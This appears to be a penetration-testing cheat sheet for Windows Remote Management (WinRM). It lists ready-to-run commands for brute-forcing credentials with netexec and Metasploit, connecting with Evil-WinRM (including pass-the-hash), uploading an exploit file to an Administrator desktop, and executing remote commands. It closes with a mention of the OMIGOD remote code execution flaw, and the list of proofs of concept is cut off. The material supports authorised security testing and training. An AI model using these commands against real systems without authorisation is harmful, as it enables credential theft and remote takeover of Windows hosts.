WinRM (Windows Remote Management) Pentesting
Last modified: 2024-02-18
The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP), 5986 (HTTPS), and also used 47001.
Enumeration
Brute Force Credentials
netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt
# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
Connect with Evil-WinRM
Evil-WinRM is a Windows Remote Management shell for pentesting.
Below are list of commands for each situation.
Connect
evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password
# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc
# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts
# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S
If you have private key and public key, you can use them for authentication.
# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key
Commands
After connecting, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.
# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt
# List all services
PS> services
Command Execution with NetExec
# -x: Execute a command
netexec winrm <target-ip> -d DOMAIN -u username -p password -x 'whoami'
netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'
# -H: Login with Pass The Hash
netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'
OMIGOD (CVE-2021-38647)
Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).
There are many PoC available, for instance: